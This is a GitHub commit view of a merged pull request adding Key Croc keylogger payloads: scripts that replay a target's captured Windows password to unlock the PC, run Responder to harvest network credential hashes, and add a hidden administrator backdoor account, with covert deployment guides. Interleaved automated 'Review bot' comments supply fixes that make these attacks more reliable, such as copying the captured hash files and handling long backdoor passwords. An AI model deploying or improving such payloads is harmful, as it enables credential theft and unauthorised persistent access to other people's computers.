Merge pull request #4 from saintcrossbow/master

Skeleton Key - Auto Creds Bypass
pull/10/head
Darren Kitchen 2020-07-01 12:08:04 -07:00 committed by GitHub
commit 4e1811fa3a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 246 additions and 0 deletions

@ -0,0 +1,42 @@
# Skeleton Key
### Deploy to target, come back later to unlock automatically - no checking of logs necessary
---
Arm the Key Croc with an automatic lockpick for Windows 10! After preparing the Key Croc for deployment, place it on a target with a lock screen. Once the target unlocks the PC, their first entry into the Key Croc will be their password. The Skeleton Key payload listens for your secret command, and then unlocks the computer automatically with that password.
Like most skeleton keys, this will not be 100% reliable. The target may enter in the wrong password, or maybe drum on the keys before logging in.
The payload was tested on Windows 10 for both PIN and passwords.
*Setup*
1. Connect the Key Croc and place into arming mode
2. Save offline and then delete all logs in the loot directory
3. Place both the `skeletonkey.txt` and `skeletonagain.txt` in the payloads directory
4. Optionally change the MATCH string to a unique passphrase of your choice
5. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Ensure the target is on a lock screen
2. Remove target keyboard, place the Key Croc on the USB, and connect keyboard to Key Croc when LED is white
3. Cross your fingers and leave
*Turn Skeleton Key*
You get two shots at it! Afterwards, just analyze the log file.
1. Do not disconnect the Key Croc
2. Enter an incorrect password so you receive "The PIN / password is incorrect - try again" message with the OK button. _Do not click the OK button_ - instead...
3. Type the secret phrase `skeletonknock`
4. Didn't work? They may have used the mouse to get to the password screen. Repeat step #2 and then try `skeletonagain`
5. Still no luck? Looks like it isn't your day, but next time you should have better luck. Open the log on a different PC or via SSH to get the password.
*Now* remove the Key Croc and be on your merry way
*Why SkeletonKnock? I thought this was called _skeleton key_*
You're right! But I thought it less likely for anyone to type `skeletonknock`.
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.
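
Review bot: Two constraints of the payloads are missing from Setup and Turn Skeleton Key. Both payload files cut the log at `head -c 25`, so the procedure only recovers passwords of roughly 25 characters or fewer, and that limit should be stated next to "tested ... for both PIN and passwords". The difference between the two trigger phrases is only hinted at in step 4: `skeletonknock` discards the first logged keystroke (assumed to be the key the target pressed to dismiss the lock screen) while `skeletonagain` replays from the first keystroke (target clicked through with the mouse); say so explicitly so the reader knows which to try first. Setup step 2 should also give the reason the loot logs must be empty: the payload replays the first bytes of `croc_char.log`, so any leftover content is typed instead of the password.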

@ -0,0 +1,15 @@
# Title: SkeletonAgain
# Description: Plays back last likely password - this time assuming logged in with mouse
# Author: SaintCrossbow
# Version: 1.0
# Category: Bypass
#
# Usage: Enter an invalid key, press enter, type "skeletonagain" to enter the last password
MATCH skeletonagain
QUACK ENTER
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 25 | awk -F 'ꬾ' '{print $1}')
QUACK ENTER
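
Review bot: The command substitution on the `QUACK STRING` line is unquoted, so the recovered password is word-split and glob-expanded by the shell before QUACK sees it; a password containing spaces or `*` is not typed back faithfully. Quote it: `QUACK STRING "$(...)"`. Two smaller points in the same pipeline: `head -c 25` counts bytes, not characters, and runs before the cut at the `ꬾ` sentinel, so a password near the limit has the cut land inside the 3-byte sentinel and a stray partial byte gets typed; cut at the first sentinel first and bound the length afterwards. The second `sed` strips every bracketed token other than `[ENTER]`, so if the log records Backspace as a bracketed token, a typo the target corrected is replayed with the typo intact. The leading `cat` can go (`sed 's/...' /root/loot/croc_char.log | ...`).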

@ -0,0 +1,15 @@
# Title: SkeletonKey
# Description: Plays back last likely password
# Author: SaintCrossbow
# Version: 1.0
# Category: Bypass
#
# Usage: Enter an invalid key, press enter, type "skeletonknock" to enter the last password
MATCH skeletonknock
QUACK ENTER
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 26 | tail -c 25 | awk -F 'ꬾ' '{print $1}')
QUACK ENTER
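
Review bot: This file is a copy of the skeletonagain payload that differs only in `head -c 26 | tail -c 25`, and neither the header comment nor the Usage line says why the first byte is dropped. Add a comment that the first logged keystroke is assumed to be the key pressed to dismiss the lock screen, so a reader changing the byte counts keeps the two files in step; the same unquoted `$(...)` and byte-versus-character issues as in skeletonagain apply here, and whatever fix lands there should be applied to this line too.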

@ -0,0 +1,32 @@
# Timed Responder Attack
### Hang back for a few extra minutes and collect network credentials
---
After you've attached the Key Croc, why not take the opportunity to try for some network credentials? Start with your MATCH phrase and a responder attack runs for the total minutes you specify. You'll want to hang around for completion though: the target will briefly lose keyboard connection twice. Afterwards you can leave it behind to continue to quietly gather keystrokes.
The payload was tested on Windows 10.
*Setup*
1. Connect the Key Croc on your PC in ARMING mode
2. If you haven't already, get the additional tools using the INSTALL_EXTRAS script
3. Place `timedresponder.txt` in the payloads directory
4. Change the `GATHER_FOR` variable to the number of seconds to run responder
5. Optionally change the MATCH string to a unique passphrase of your choice
6. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Connect the Key Croc to target in attack configuration
2. Look around slyly and make sure you are in the clear for a few minutes
3. Start responder by typing `__responder`
4. The Key Croc will go into both HID and RNDIS mode, indicated by LED magenta
5. While responder is running, the LED will flash with a single yellow blink
6. The logs will be copied to /root/loot, indicated by a fast white blink
7. A brief LED flash of green means your attack is complete.
Take the croc with you, or leave it behind to continue stealing keystokes.
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.
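
Review bot: The units for `GATHER_FOR` disagree within this README: the intro says responder "runs for the total minutes you specify", while Setup step 4 says "number of seconds". The payload sleeps for `$GATHER_FOR` seconds, so change the intro to seconds (or say "120 = 2 minutes" as the payload comment does). Minor: "keystokes" on the last Deploy line.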

@ -0,0 +1,31 @@
# Title: Start responder for n minutes while still being in keyboard mode
# Note: Not fully covert - allow for brief keyboard outage
# Author: Saint Crossbow
# Version: 1.0
MATCH __responder
# Gather for however many minutes (e.g. 120 = 2 minutes)
GATHER_FOR=120
echo "[*] Starting attack"
LED SETUP
ATTACKMODE HID RNDIS_ETHERNET RNDIS_SPEED_2000000 &
sleep 15
LED ATTACK
/tools/responder/Responder.py -I usb0 -f -w -r -d -F &
bpid=$!
sleep $GATHER_FOR
LED CLEANUP
echo "[*] Stopping attack"
kill $bpid
wait $bpid
LED FINISH
cp /tools/responder/logs/*.log /root/loot/
ATTACKMODE HID
sleep 2
LED OFF
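
Review bot: The comment above `GATHER_FOR=120` says "however many minutes" but `sleep $GATHER_FOR` sleeps seconds; the title line has the same mistake, so fix both to "seconds (e.g. 120 = 2 minutes)". The `cp /tools/responder/logs/*.log /root/loot/` glob copies only the session logs: Responder writes the captured hashes to per-host `.txt` files (and `Responder.db`) in that directory, so copy the whole directory instead (`cp -r /tools/responder/logs /root/loot/`). The fixed `sleep 15` after `ATTACKMODE ... &` is a guess at how long enumeration takes; polling for the interface before launching Responder (`until ip link show usb0 >/dev/null 2>&1; do sleep 1; done`) is more robust and usually shorter.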

@ -0,0 +1,30 @@
# Back Door Account
### Add an account to an unlocked PC before the keystrokes are caught
---
Simple script that adds an administrative user for later access. Only works, of course, if the PC is unlocked. However this is a nice complement to the SkeletonKey payload: just add the new user when you unlock the PC.
The payload was tested on Windows 10.
*Setup*
1. Connect the Key Croc and place into arming mode
2. Place `addadmin.txt` in the payloads directory
3. Change the `BACKDOOR_USER` variable to something that will blend into the environment
4. Change the `BACKDOOR_PASS` variable to a reasonably strong password
5. Optionally change the MATCH string to a unique passphrase of your choice
6. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Connect the Key Croc to target in attack configuration
2. If you are lucky enough to find yourself at an unlocked screen, type `__addadmin`
3. With some luck, your user name and password will be added
*Cleanup*
1. Remove the user from the admin group: `net localgroup administrators officeadmin /delete`
2. Remove the user from the system: `net users officeadmin /delete`
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.
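
Review bot: The Cleanup commands hardcode `officeadmin` while Setup step 3 tells the reader to change `BACKDOOR_USER`, so anyone who followed step 3 will run cleanup against the wrong name; write them with the placeholder (`net user <BACKDOOR_USER> /delete`). Step 1 is also redundant, since deleting the account removes its group memberships. Worth adding: `net user /delete` does not remove the profile folder under `C:\Users` if the account was ever logged into interactively, so cleanup should mention removing that as well.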

@ -0,0 +1,26 @@
# Title: Add a backdoor user to access PC later (assuming PC is unlocked)
# Author: Saint Crossbow
# Version: 1.0
MATCH __addadmin
LED ATTACK
BACKDOOR_USER="officeadmin"
BACKDOOR_PASS="changethis"
sleep 2
Q GUI r
Q STRING "cmd"
Q CTRL-SHIFT ENTER
sleep 2
Q ALT Y
sleep 1
Q STRING "net user /add $BACKDOOR_USER $BACKDOOR_PASS"
Q ENTER
Q STRING "net localgroup administrators $BACKDOOR_USER /add"
Q ENTER
Q STRING "exit"
Q ENTER
LED FINISH
sleep 1
LED OFF
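
Review bot: `net user ... /add` prompts for Y/N confirmation when the password is longer than 14 characters, and this script then types the `net localgroup` line into that prompt; since the README asks for a "reasonably strong password", add `/y` (`net user $BACKDOOR_USER $BACKDOOR_PASS /add /y`). The `sleep 2` sits before `Q GUI r` but there is no pause between `Q GUI r` and `Q STRING "cmd"`, so the Run dialog may not have focus when `cmd` is typed; move the sleep after `Q GUI r`. `Q ALT Y` also assumes the logged-in user is a local administrator who gets a consent prompt; a standard user gets a credential prompt and the remaining lines are typed into it, so the README should state that requirement. Finally, `BACKDOOR_PASS` is passed to cmd unquoted, so characters such as `&`, `|`, `%` or `^` in the chosen password will break the command line.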

@ -0,0 +1,25 @@
# Keep Alive
### Don't let the PC fall asleep
---
Like having a mouse wiggler on for your Key Croc, except with keys! Unlike a regular mouse wiggler, this will constantly press Control - so typing while it is active is not recommended.
The payload was tested on Windows 10. It may be run with seconds specified as a parameter while in SSH (just remove the MATCH).
*Setup*
1. Connect the Key Croc and place into arming mode
2. Place `keepalive.txt` in the payloads directory
3. Change the `TOTAL_SEC` variable to increase time - default is an hour.
4. Optionally change the MATCH string to a unique passphrase of your choice
5. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Connect the Key Croc to target in attack configuration
2. Type `__staylive` to start the keep awake routine: it will flash yellow while it is active
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.
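
Review bot: Setup step 3 says to change `TOTAL_SEC` "to increase time" without giving the unit; the payload counts seconds (3600 = one hour), so say so. The caveat that typing is not possible while the payload runs follows from pressing Control once per second, which is far more often than any screen-lock timeout needs; if the payload is changed to press every 30 seconds or so, this paragraph can say that typing is merely disrupted rather than ruled out.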

@ -0,0 +1,30 @@
# Title: Keep the PC from locking - default 1 hour
# When executed from command line without MATCH can specify time
# Author: Saint Crossbow
# Version: 1.0
MATCH __staylive
LED ATTACK
if [ $# -eq 0 ]
then
TOTAL_SEC=3600
echo "Default time of 60 minutes used"
else
echo "Running for total $1 seconds"
TOTAL_SEC=$1
fi
echo $TOTAL_SEC
i=1
while [ "$i" -le "$TOTAL_SEC" ]; do
echo -n "."
Q CONTROL
sleep 1
i=$(($i + 1))
done
echo
LED FINISH
sleep 1
LED OFF
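
Review bot: `$1` is used unvalidated as `TOTAL_SEC`; a non-numeric argument makes `[ "$i" -le "$TOTAL_SEC" ]` fail on the first comparison and the script exits without pressing anything, so check it (`case $1 in ''|*[!0-9]*) echo "usage: keepalive [seconds]"; exit 1;; esac`). The loop also overruns: each iteration takes one second plus the time `Q CONTROL` needs, so 3600 iterations last noticeably longer than an hour; compare against a deadline (`end=$(( $(date +%s) + TOTAL_SEC ))`; `while [ "$(date +%s)" -lt "$end" ]`) instead of counting iterations. Pressing Control every second is much more than lock timeouts require and is what makes typing impossible while it runs; a `sleep 30` between presses keeps the PC awake with far less interference.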